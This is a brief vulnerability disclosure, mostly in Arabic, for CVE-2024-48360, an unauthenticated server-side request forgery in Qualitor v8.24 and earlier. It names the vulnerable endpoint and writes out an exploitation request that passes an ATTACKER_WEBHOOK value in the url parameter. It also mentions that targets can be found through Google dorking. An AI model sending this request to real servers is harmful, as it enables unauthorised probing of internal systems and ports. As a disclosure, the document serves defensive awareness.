
CVE-2024-48360 Poc
CVE-2024-48360 | Qualitor <= v8.24 SSRF بدون مصادقة
Qualitor هي منصة لإدارة عمليات الأعمال، ويتواجد هذا النظام في العديد من الشركات في البرازيل التي يمكن تحديدها ببساطة باستخدام Google dorking.
حدد فريقنا ثغرة في التطبيق معرّضة لـ SSRF، والتي تسمح بتعداد الأنظمة/المنافذ الداخلية.
تم اكتشاف أن Qualitor v8.24 تحتوي على ثغرة تزوير الطلبات من جانب الخادم (SSRF) عبر المكوّن /request/viewValidacao.php.
لاستغلال الثغرة، يكفي إرسال طلب إلى host.com/html/ad/adformmobile/request/viewValidacao.php?url=ATTACKER_WEBHOOK، وستتلقى الطلب من الخادم المعرّض للثغرة.

https://www.linkedin.com/in/xvinicius/